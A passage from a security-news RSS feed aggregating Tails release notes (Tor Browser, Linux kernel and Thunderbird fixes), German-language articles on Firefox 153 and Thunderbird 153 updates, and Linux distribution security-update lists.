<guid isPermaLink="true">https://tsecurity.de/de/3687672/it-security-tools/tails-771/</guid>
<pubDate>Wed, 22 Jul 2026 23:53:39 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This release is an emergency release to fix important security
vulnerabilities in <em>Tor Browser</em>.</p>

<h1>Changes and updates</h1>


<ul>
<li><p>Update <em>Tor Browser</em> to
<a href="https://blog.torproject.org/new-release-tor-browser-15011/">15.0.11</a>, which
fixes <a href="https://www.mozilla.org/en-US/security/advisories/mfsa2026-36/">several vulnerabilities in <em>Firefox</em>
140.10.1</a>.</p>

<div class="attack">

<p>We are not aware of these vulnerabilities being exploited in practice until now.</p>

</div>
</li>
<li><p>Update <em>Thunderbird</em> to <a href="https://www.thunderbird.net/en-US/thunderbird/140.10.0esr/releasenotes/">140.10.0</a>.</p></li>
<li><p>Stop making it possible to start our ISO images from a USB stick.</p>

<p>Since <a href="https://tails.net/news/version_3.12/">2019</a>, we recommend <em>USB images</em> to start Tails
from a USB stick, which is by far the most common way of running Tails.</p>

<p>We still distribute <a href="https://tails.net/install/download-iso/index.en.html"><em>ISO images</em></a> to start Tails from
a DVD or in a virtual machine. Until now, these ISO images worked on USB
sticks as well, but provided a degraded experience without automatic upgrades
or Persistent Storage.</p>

<p>Our ISO images no longer work on USB sticks to save a few megabytes and
prevent confusion for people who use USB sticks.</p></li>
</ul>


<p>For more details, read our <a href="https://gitlab.tails.boum.org/tails/tails/-/blob/master/debian/changelog">changelog</a>.</p>

<h1>Get Tails 7.7.1</h1>


<h2>To upgrade your Tails USB stick and keep your Persistent Storage</h2>

<ul>
<li><p>Automatic upgrades are available from Tails 7.0 or later to 7.7.1.</p></li>
<li><p>If you cannot do an automatic upgrade or if Tails fails to start after an
automatic upgrade, please try to do a <a href="https://tails.net/doc/upgrade/index.en.html#manual">manual upgrade</a>.</p></li>
</ul>


<h2>To install Tails 7.7.1 on a new USB stick</h2>

<p>Follow our <a href="https://tails.net/install/index.en.html">installation instructions</a>.</p>

<div class="caution"><p>The Persistent Storage on the USB stick will be lost if
you install instead of upgrading.</p></div>


<h2>To download only</h2>

<p>If you don't need installation or upgrade instructions, you can download
Tails 7.7.1 directly:</p>

<ul>
<li><p><a href="https://tails.net/install/download/index.en.html">For USB sticks (USB image)</a></p></li>
<li><p><a href="https://tails.net/install/download-iso/index.en.html">For DVDs and virtual machines (ISO image)</a></p></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tails 7.7.3]]></title>
<description><![CDATA[This release is an emergency release to fix a critical security vulnerability in
the Linux kernel, as well as security vulnerabilities in Tor Browser and in
the Tor client.

Changes and updates



Update the Linux kernel to 6.12.86, which fixes Dirty
Frag, a vulnerability that could allow an appl...]]></description>
<link>https://tsecurity.de/de/3687670/it-security-tools/tails-773/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687670/it-security-tools/tails-773/</guid>
<pubDate>Wed, 22 Jul 2026 23:53:37 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This release is an emergency release to fix a critical security vulnerability in
the Linux kernel, as well as security vulnerabilities in <em>Tor Browser</em> and in
the <em>Tor</em> client.</p>

<h1>Changes and updates</h1>


<ul>
<li><p>Update the <em>Linux</em> kernel to 6.12.86, which fixes <a href="https://github.com/V4bel/dirtyfrag">Dirty
Frag</a>, a vulnerability that could allow an application in
Tails to gain administration privileges.</p>

<p>For example, if an attacker was able to exploit other unknown security
vulnerabilities in an application included in Tails, they might then use Dirty
Frag to take full control of your Tails and deanonymize you.</p>

<div class="attack">

<p>We are not aware of this vulnerability being used in practice until now.</p>

</div>
</li>
<li><p>Update <em>Tor Browser</em> to <a href="https://blog.torproject.org/new-release-tor-browser-15012/">15.0.12</a>.</p></li>
<li><p>Update the <em>Tor</em> client to 0.4.9.8.</p></li>
<li><p>Update <em>Thunderbird</em> to <a href="https://www.thunderbird.net/en-US/thunderbird/140.10.1esr/releasenotes/">140.10.1</a>.</p></li>
</ul>


<h1>Fixed problems</h1>


<p>For more details, read our <a href="https://gitlab.tails.boum.org/tails/tails/-/blob/master/debian/changelog">changelog</a>.</p>

<h1>Get Tails 7.7.3</h1>


<h2>To upgrade your Tails USB stick and keep your Persistent Storage</h2>

<ul>
<li><p>Automatic upgrades are available from Tails 7.0 or later to 7.7.3.</p></li>
<li><p>If you cannot do an automatic upgrade or if Tails fails to start after an
automatic upgrade, please try to do a <a href="https://tails.net/doc/upgrade/index.en.html#manual">manual upgrade</a>.</p></li>
</ul>


<h2>To install Tails 7.7.3 on a new USB stick</h2>

<p>Follow our <a href="https://tails.net/install/index.en.html">installation instructions</a>.</p>

<div class="caution"><p>The Persistent Storage on the USB stick will be lost if
you install instead of upgrading.</p></div>


<h2>To download only</h2>

<p>If you don't need installation or upgrade instructions, you can download
Tails 7.7.3 directly:</p>

<ul>
<li><p><a href="https://tails.net/install/download/index.en.html">For USB sticks (USB image)</a></p></li>
<li><p><a href="https://tails.net/install/download-iso/index.en.html">For DVDs and virtual machines (ISO image)</a></p></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tails 7.8]]></title>
<description><![CDATA[Changes and updates



Update Tor Browser to 15.0.14.
Remove Thunderbird.

You can still install Thunderbird as additional
software.

If you have both the Thunderbird Email Client and Additional Software
features of the Persistent Storage turned on, Tails automatically adds
Thunderbird to your li...]]></description>
<link>https://tsecurity.de/de/3687669/it-security-tools/tails-78/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687669/it-security-tools/tails-78/</guid>
<pubDate>Wed, 22 Jul 2026 23:53:36 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Changes and updates</h1>


<ul>
<li><p>Update <em>Tor Browser</em> to <a href="https://blog.torproject.org/new-release-tor-browser-15014/">15.0.14</a>.</p></li>
<li><p>Remove <em>Thunderbird</em>.</p>

<p>You can still <a href="https://tails.net/doc/anonymous_internet/thunderbird/index.en.html">install <em>Thunderbird</em> as additional
software</a>.</p>

<p>If you have both the <strong>Thunderbird Email Client</strong> and <strong>Additional Software</strong>
features of the Persistent Storage turned on, Tails automatically adds
<em>Thunderbird</em> to your list of <a href="https://tails.net/doc/persistent_storage/additional_software/index.en.html">additional
software</a>.</p>

<p>A new version of <em>Thunderbird</em> is released in Debian shortly after each Tails
release, because both <em>Tails</em> and <em>Thunderbird</em> follow the <a href="https://whattrainisitnow.com/calendar/">release calendar
of <em>Firefox</em></a>. As a consequence,
until Tails 7.5 (February 2026), the version of <em>Thunderbird</em> in Tails was
almost always outdated, with known security vulnerabilities.</p>

<p>By installing <em>Thunderbird</em> as additional software, the latest version
of <em>Thunderbird</em> is installed automatically from your Persistent Storage each
time you start Tails.</p></li>
</ul>


<h1>Fixed problems</h1>


<ul>
<li><p>Fix multiple security vulnerabilities in the Linux kernel and haveged, that
could allow an application in Tails to gain administration privileges.</p>

<p>For example, if an attacker was able to exploit other unknown security
vulnerabilities in an application included in Tails, they might then use one
of these vulnerabilities to take full control of your Tails and
deanonymize you.</p></li>
</ul>


<p>For more details, read our <a href="https://gitlab.tails.boum.org/tails/tails/-/blob/master/debian/changelog">changelog</a>.</p>

<h1>Get Tails 7.8</h1>


<h2>To upgrade your Tails USB stick and keep your Persistent Storage</h2>

<ul>
<li><p>Automatic upgrades are available from Tails 7.0 or later to 7.8.</p></li>
<li><p>If you cannot do an automatic upgrade or if Tails fails to start after an
automatic upgrade, please try to do a <a href="https://tails.net/doc/upgrade/index.en.html#manual">manual upgrade</a>.</p></li>
</ul>


<h2>To install Tails 7.8 on a new USB stick</h2>

<p>Follow our installation instructions:</p>

<ul>
<li><p><a href="https://tails.net/install/windows/index.en.html">Install from Windows</a></p></li>
<li><p><a href="https://tails.net/install/mac/index.en.html">Install from macOS</a></p></li>
<li><p><a href="https://tails.net/install/linux/index.en.html">Install from Linux</a></p></li>
<li><p><a href="https://tails.net/install/expert/index.en.html">Install from Debian or Ubuntu using the command line and GnuPG</a></p></li>
</ul>


<div class="caution"><p>The Persistent Storage on the USB stick will be lost if
you install instead of upgrading.</p></div>


<h2>To download only</h2>

<p>If you don't need installation or upgrade instructions, you can download
Tails 7.8 directly:</p>

<ul>
<li><p><a href="https://tails.net/install/download/index.en.html">For USB sticks (USB image)</a></p></li>
<li><p><a href="https://tails.net/install/download-iso/index.en.html">For DVDs and virtual machines (ISO image)</a></p></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird 153: Update verbessert vor allem Sicherheit bei OAuth-Anmel­dung]]></title>
<description><![CDATA[Mit dem Thunderbird-Update auf Version 153 setzt Mozilla vor allem bei der Verbesserung der Sicherheit an und überarbeitet unter anderem den OAuth-Anmeldeprozess, integriert verschiedene Thundermail-Dienste direkt in den E-Mail-Client und beseitigt zahlreiche Fehler in Bereichen wie E-Mail, Kalen...]]></description>
<link>https://tsecurity.de/de/3686294/it-nachrichten/thunderbird-153-update-verbessert-vor-allem-sicherheit-bei-oauth-anmeldung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686294/it-nachrichten/thunderbird-153-update-verbessert-vor-allem-sicherheit-bei-oauth-anmeldung/</guid>
<pubDate>Wed, 22 Jul 2026 14:32:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://pics.computerbase.de/1/2/3/9/0/8-0863962e5189707a/article-640x360.b376b700.jpg"><p>Mit dem Thunderbird-Update auf Version 153 setzt Mozilla vor allem bei der Verbesserung der Sicherheit an und überarbeitet unter anderem den OAuth-Anmeldeprozess, integriert verschiedene Thundermail-Dienste direkt in den E-Mail-Client und beseitigt zahlreiche Fehler in Bereichen wie E-Mail, Kalender und OpenPGP.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox 153.0 behebt über 60 Schwachstellen und erstellt QR-Codes]]></title>
<description><![CDATA[Die neue Firefox-Version 153 für Windows, macOS, Linux und Android bringt einige Verbesserungen bei der Benutzung wie etwa HDR-Videowiedergabe, abgeschottete Tab-Umgebungen, und QR-Code-Erzeugung zur Link-Weitergabe. Die Entwickler haben mehr als 60 Sicherheitslücken gestopft. Updates gibt es auc...]]></description>
<link>https://tsecurity.de/de/3685544/it-nachrichten/firefox-1530-behebt-ueber-60-schwachstellen-und-erstellt-qr-codes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685544/it-nachrichten/firefox-1530-behebt-ueber-60-schwachstellen-und-erstellt-qr-codes/</guid>
<pubDate>Wed, 22 Jul 2026 09:51:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Die neue Firefox-Version 153 für Windows, macOS, Linux und Android bringt einige Verbesserungen bei der Benutzung wie etwa HDR-Videowiedergabe, abgeschottete Tab-Umgebungen, und QR-Code-Erzeugung zur Link-Weitergabe. Die Entwickler haben mehr als 60 Sicherheitslücken gestopft. Updates gibt es auch für die ESR-Versionen.</p>



<p>Im <a href="https://www.mozilla.org/en-US/security/advisories/mfsa2026-68/" target="_blank" rel="noreferrer noopener">Sicherheitsbericht für Firefox 153</a> nennt Mozilla mehr als 63 beseitigte Sicherheitslücken, von denen 60 durch externe Sicherheitsforscher entdeckt und gemeldet wurden, drei davon durch OpenAI Codex Security. Mozilla stuft 17 dieser Schwachstellen als hohes Risiko ein. Bei vier dieser Lücken drohen Ausbrüche aus der Browser-Sandbox.</p>



<p><a href="https://www.pcwelt.de/article/1197811/die-neuesten-sicherheits-updates.html" target="_blank" rel="noreferrer noopener">▶Die neuesten Sicherheits-Updates</a></p>



<p>Weitere 35 Schwachstellen sind als mittleres Risiko ausgewiesen, der Rest als geringes Risiko. Die drei letzten Einträge im Sicherheitsbericht fassen eine nicht angegebene Zahl intern gefundener, als hohes Risiko eingestufter Sicherheitslücken zusammen, die aus Programmierfehlern bei der Speicherverwaltung resultieren. Die Lücken sind danach gruppiert, welche Programme und Programmversionen betroffen sind.</p>



<h2 class="wp-block-heading toc">Was ist neu in Firefox 153?</h2>



<p>Für Windows-Nutzer bietet Firefox 153 die Wiedergabe von HDR-Videos (High Dynamic Range). Voraussetzung ist, dass der HDR-Modus in den Windows Bildschirmeinstellungen aktiviert ist. Notebook-Displays, die lediglich „HDR Video-Streaming“ bieten, werden derzeit nicht unterstützt, ebenso wie Smartphone-Videos im Hochkant-Format.</p>



<p>Mit dem integrierten PDF-Betrachter und -Editor können Sie nun mehrere PDF-Dateien zusammenführen, indem Sie sie in die PDF-Sidebar ziehen. Auch können Sie jetzt Bilder als neue Seiten in PDF-Dokumente einfügen.</p>



<p>Wenn Sie einen Link weitergeben wollen, etwa auch an Ihr eigenes Smartphone, ohne einen Web-Dienst (wie Firefox Sync) zu benutzen, können Sie mit Firefox 153 einen QR-Code erstellen. Firefox hebt nun das Symbol für die Standort-Freigabe in roter Farbe hervor, wenn eine Website Zugriff auf Ihren Standort hat.</p>


<div class="extendedBlock-wrapper block-coreImage center"><figure data-wp-context='{"imageId":"6a6076312fb5f"}' data-wp-interactive="core/image" class="wp-block-image aligncenter size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/ffx153-qrcode.webp" alt="Firefox 153 erstellt QR-Codes" class="wp-image-3196298" width="1024" height="576" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><em>Link mittels QR-Code teilen</em></figcaption></figure><p class="imageCredit">fz</p></div>



<p>Das mit Firefox 149 eingeführte und in Firefox integrierte Gratis-VPN bietet weiterhin eine vorübergehend (bis Ende August) auf 28 Länder erweiterte Auswahl virtueller Standorte mit uneingeschränktem Datenvolumen. Das kostenlose VPN ist derzeit für Firefox-Nutzer in den USA, Kanada, Großbritannien, Frankreich und Deutschland verfügbar.</p>



<p><strong>Tipp:</strong> Unabhängig davon, dass Sie Ihren Browser stets aktuell halten, sollten Sie die Sicherheit Ihres PCs zusätzlich mit geeigneter Antivirus-Software verbessern. Gute Antivirus-Lösungen stellen wir in „<a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html" target="_blank" rel="noreferrer noopener">Die besten Antivirus-Programme 2025 im Test: So schützen Sie Ihren Windows-PC</a>“ vor. Falls Sie großen Wert auf anonymes Surfen legen, <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">sind wiederum gute VPN-Programme einen Blick wert.</a></p>



<h2 class="wp-block-heading toc">Weitere Browser-Updates</h2>



<p>Neben <a title="Download" href="https://www.pcwelt.de/article/1082606/firefox-50.html" data-type="link" data-id="https://www.pcwelt.de/article/1082606/firefox-50.html" target="_blank" rel="noreferrer noopener">Firefox 153.0</a> sind auch die ESR-Ausgaben 140.13.0 und 115.38.0 erhältlich. Letztere gibt es allerdings nur für Windows 7 &amp; 8.1 sowie macOS 10.12 bis 10.14. In den ESR-Versionen haben Mozillas Entwickler diejenigen der oben genannten Schwachstellen behoben, die schon im teils gut abgehangenen Code dieser Browser-Generationen stecken. Das sind in Firefox 140.13 mindestens 32 und in Firefox 115.38 immerhin noch wenigstens 14 geschlossene Sicherheitslücken. Darunter sind zwei als kritisch eingestufte Schwachstellen, die <a href="https://www.pcwelt.de/article/3167428/firefox-152-fuer-windows-mac-linux-mehr-sicherheit-neuer-look.html" target="_blank" rel="noreferrer noopener">bereits in Firefox 152.0.6 beseitigt</a> wurden. Firefox 153 ist außerdem die Basis für die nächste ESR-Generation. Das bedeutet, Firefox ESR 140 wird im Oktober durch Firefox ESR 153 abgelöst.</p>



<h2 class="wp-block-heading toc">Gnadenfrist für Windows 7 &amp; 8 erneut verlängert</h2>



<p>Firefox ESR 115 wird vorerst bis März 2027 (v115.52) weiter <a href="https://support.mozilla.org/de/kb/firefox-nutzer-win-7-8-81-umstellung-firefox-esre" target="_blank" rel="noreferrer noopener">mit Sicherheits-Updates gepflegt</a>. Wenn Sie Firefox 115 unter Windows 7, 8.1 oder macOS 10.12 bis 10.14 einsetzen, erhalten Sie zumindest für den Browser weiterhin aktuelle Sicherheits-Updates. Rechtzeitig vor Ablauf dieser Gnadenfrist wird Mozilla die Situation neu bewerten und dann entscheiden, ob es eine weitere Verlängerung gibt.</p>



<h2 class="wp-block-heading toc">Updates für Tor Browser und Thunderbird</h2>



<p>Der neueste <a href="https://www.pcwelt.de/article/1105413/anonymisierungs-programm-tor.html" target="_blank" rel="noreferrer noopener" title="Download">Tor Browser</a> 15.0.19 basiert auf Firefox ESR 140.13. Das ansonsten von Mozilla unabhängige Tor-Projekt und die Nutzer des Tor Browsers profitieren so von den in Firefox gestopften Sicherheitslücken. Tor Browser 15.0.9 bringt die Erweiterung NoScript 13.6.31 mit. Das Tor Projekt hostet NoScript für seinen Browser inzwischen selbst. Erkennbar ist das daran, dass diese NoScript-Version den Suffix „.1984“ (aktuell also 13.6.31.1984) trägt – George Orwell lässt grüßen. Ansonsten ist sie identisch mit der Version auf AMO (addons.mozilla.org). Einen Tor Browser für ältere Systeme gibt es nicht mehr. Auch Mozillas Mailer <a href="https://www.pcwelt.de/article/1164952/email-client-thunderbird.html" data-type="link" data-id="https://www.pcwelt.de/article/1164952/email-client-thunderbird.html" target="_blank" rel="noreferrer noopener" title="Download">Thunderbird</a> 153.0 und 140.13.0esr sind verfügbar. Darin haben die Entwickler ebenfalls Dutzende Sicherheitslücken beseitigt, die das Mail-Programm vorwiegend von Firefox geerbt hat. </p>



<p>Bis zur Veröffentlichung der nächsten Hauptversion Firefox 154 am 18. August plant Mozilla wöchentliche Updates zur Fehlerbehebung und um weitere Schwachstellen zu beseitigen. Nach Firefox 154 wechselt Mozilla, wie auch Google Chrome und Microsoft Edge, auf einen <a href="https://www.pcwelt.de/article/3190234/bald-sollen-die-webbrowser-doppelt-so-oft-aktualisiert-werden.html" target="_blank" rel="noreferrer noopener">zweiwöchentlichen Turnus</a> für neue Hauptversionen. Firefox 155 soll demnach bereits am 1. September erscheinen.</p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird für Android: Version 21.0 bringt modernisierte Menüs und wichtige Bugfixes]]></title>
<description><![CDATA[Das Entwicklerteam hinter Thunderbird für Android hat Version 21.0 freigegeben. Das Update für den mobilen E-Mail-Client konzentriert sich neben optischen Anpassungen vor allem auf die Stabilität und behebt diverse Fehler, die im Alltag für Frust sorgen konnten. Bei den Einstellungen...Zum Beitra...]]></description>
<link>https://tsecurity.de/de/3683869/it-nachrichten/thunderbird-fuer-android-version-210-bringt-modernisierte-menues-und-wichtige-bugfixes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683869/it-nachrichten/thunderbird-fuer-android-version-210-bringt-modernisierte-menues-und-wichtige-bugfixes/</guid>
<pubDate>Tue, 21 Jul 2026 15:34:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Entwicklerteam hinter Thunderbird für Android hat Version 21.0 freigegeben. Das Update für den mobilen E-Mail-Client konzentriert sich neben optischen Anpassungen vor allem auf die Stabilität und behebt diverse Fehler, die im Alltag für Frust sorgen konnten. Bei den Einstellungen...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/thunderbird-fuer-android-version-21-0-bringt-modernisierte-menues-und-wichtige-bugfixes/">Thunderbird für Android: Version 21.0 bringt modernisierte Menüs und wichtige Bugfixes</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (capstone, fence-agents, gimp, glib2, hplip, httpd, jackson-annotations, jackson-core, jackson-databind, jackson-jaxrs-providers, and jackson-modules-base, libtiff, maven:3.8, pacemaker, python3.14, and webkit2gtk3), Debian (samba), Fedora (c-ares, d...]]></description>
<link>https://tsecurity.de/de/3683836/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683836/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 21 Jul 2026 15:27:30 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (capstone, fence-agents, gimp, glib2, hplip, httpd, jackson-annotations, jackson-core, jackson-databind, jackson-jaxrs-providers, and jackson-modules-base, libtiff, maven:3.8, pacemaker, python3.14, and webkit2gtk3), <b>Debian</b> (samba), <b>Fedora</b> (c-ares, dnsx, freerdp, gpsd, libreswan, libseccomp, libtiff, mingw-python-idna, mingw-python-pip, openssh, python-pillow, wget1, and wireshark), <b>Mageia</b> (golang, graphicsmagick, haveged, libssh2, nginx, nilfs-utils, perl-CGI-Session, perl-Imager, perl-JavaScript-Minifier-XS, php, php8.4, php8.5, python-nltk, sqlite3, and xmlstarlet), <b>Oracle</b> (.NET 10.0, .NET 9.0, container-tools:ol8, firefox, giflib, glibc, go-fdo-client, go-fdo-server, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, hplip, httpd, image-builder, kernel, libtiff, mod_http2, pacemaker, perl-DBI:1.641, perl-HTTP-Daemon, php:8.2, python-markdown, ruby4.0, systemd, and thunderbird), <b>Red Hat</b> (buildah, container-tools:rhel8, dracut, golang-github-openprinting-ipp-usb, libtiff, osbuild-composer, python-urllib3, python3.12-urllib3, python3.14-urllib3, and runc), <b>SUSE</b> (389-ds, chromedriver, gstreamer-plugins-bad, libreoffice, libsuricata8_0_6, podman, python311, and sssd), and <b>Ubuntu</b> (apache2, freerdp3, freetype, libde265, libxfont, linux, linux-gcp, linux-gcp-6.8, linux-gke, linux-gkeop, linux-realtime, linux-realtime-6.8, linux, linux-gcp, linux-gcp-fips, linux-gke, linux-gkeop, linux-hwe-5.15, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-realtime, linux-xilinx-zynqmp, linux, linux-gcp, linux-gke, linux-realtime, linux-gcp-6.17, linux-realtime-6.17, linux-gcp-fips, linux-hwe-7.0, linux-nvidia-tegra-5.15, linux-oem-7.0, nginx, php8.1, php8.3, php8.5, rlottie, sqlite3, and wget).]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird 153.0 (esr) steht in den Startlöchern: Das ist neu]]></title>
<description><![CDATA[Die Entwickler von Thunderbird haben ein neues, doch recht großes Update für den Mail-Client veröffentlicht. Die Version 153.0 / 153.0esr bringt einen riesigen Schwung an Neuerungen, Detailverbesserungen und natürlich die üblichen Fehlerbehebungen unter der Haube in den esr-Zweig mit. Wer...Zum B...]]></description>
<link>https://tsecurity.de/de/3683420/it-nachrichten/thunderbird-1530-esr-steht-in-den-startloechern-das-ist-neu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683420/it-nachrichten/thunderbird-1530-esr-steht-in-den-startloechern-das-ist-neu/</guid>
<pubDate>Tue, 21 Jul 2026 12:48:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Entwickler von Thunderbird haben ein neues, doch recht großes Update für den Mail-Client veröffentlicht. Die Version 153.0 / 153.0esr bringt einen riesigen Schwung an Neuerungen, Detailverbesserungen und natürlich die üblichen Fehlerbehebungen unter der Haube in den esr-Zweig mit. Wer...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/thunderbird-153-0esr-steht-in-den-startloechern-das-ist-neu/">Thunderbird 153.0 (esr) steht in den Startlöchern: Das ist neu</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Debian (kernel, libnfs, roundcube, and tiff), Fedora (antlr4-project, chromium, erlang, libseccomp, libtiff, log4cxx, mbedtls, node-exporter, opam, openssh, proftpd, python-asyncssh, python-django5, python-libcst, python-orjson, python-uv-build, ruby, rust-ast...]]></description>
<link>https://tsecurity.de/de/3681213/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681213/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 20 Jul 2026 15:10:28 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (kernel, libnfs, roundcube, and tiff), <b>Fedora</b> (antlr4-project, chromium, erlang, libseccomp, libtiff, log4cxx, mbedtls, node-exporter, opam, openssh, proftpd, python-asyncssh, python-django5, python-libcst, python-orjson, python-uv-build, ruby, rust-astral_async_zip, spoofdpi, uv, and yq), <b>Mageia</b> (bind, clamav, erlang, libidn, libreoffice, nmap, nodejs, perl-Bytes-Random-Secure, perl-Config-IniFiles, perl-CSS-Minifier-XS, perl-HTML-Parser, perl-Mojolicious, perl-String-Util, python-pydantic-settings, rsync, and upower), <b>Oracle</b> (.NET 10.0, .NET 8.0, .NET 9.0, bind, cockpit, cockpit-image-builder, coreutils, delve, dnsmasq, dovecot, expat, fence-agents, flatpak, frr, gdk-pixbuf2, giflib, glib2, go-fdo-client and go-fdo-server, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, httpd, jq, kernel, keylime, krb5, libcap, libexif, libpng, libsndfile, libsolv, libsoup3, libtasn1, libtiff, libxslt, libyang, mariadb10.11, mod_http2, mod_md, opencryptoki, PackageKit, perl-Archive-Tar, perl-IO-Compress, poppler, postfix, postgresql-jdbc, python-urllib3, python3.14, python3.14-pip, python3.14-urllib3, qt6-qtdeclarative, rrdtool, rsync, ruby, ruby4.0, samba, skopeo, thunderbird, valkey, wireshark, xorg-x11-server-Xwayland, and yggdrasil-worker-package-manager), and <b>SUSE</b> (blender, chromium, containerized-data-importer1, cyrus-imapd, go1.26-openssl, gomuks, grafana, gstreamer-plugins-bad, kbfs, kubevirt1.8-container-disk, libxml2, lux, mariadb-connector-c, nginx, opam, openssl-3, oras, perl-DBI, php-composer2, python-django-haystack, python-paramiko, python-weasyprint, python311, python313-Pillow, python315, shibboleth-sp, system-user-zabbix, and wget).]]></content:encoded>
</item>
<item>
<title><![CDATA[Neuer PC? So übertragen Sie alles auf Windows 11 ohne Stress]]></title>
<description><![CDATA[Ein neuer PC ist schnell gekauft – der eigentliche Aufwand beginnt danach. Programme, Dateien, Benutzerkonten und Einstellungen sollen möglichst vollständig vom alten Rechner mitkommen. Wer alles von Hand einrichtet, verliert schnell einen ganzen Tag.



Umzugssoftware nimmt Ihnen diese Arbeit ab...]]></description>
<link>https://tsecurity.de/de/3679150/windows-tipps/neuer-pc-so-uebertragen-sie-alles-auf-windows-11-ohne-stress/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679150/windows-tipps/neuer-pc-so-uebertragen-sie-alles-auf-windows-11-ohne-stress/</guid>
<pubDate>Sun, 19 Jul 2026 10:41:36 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



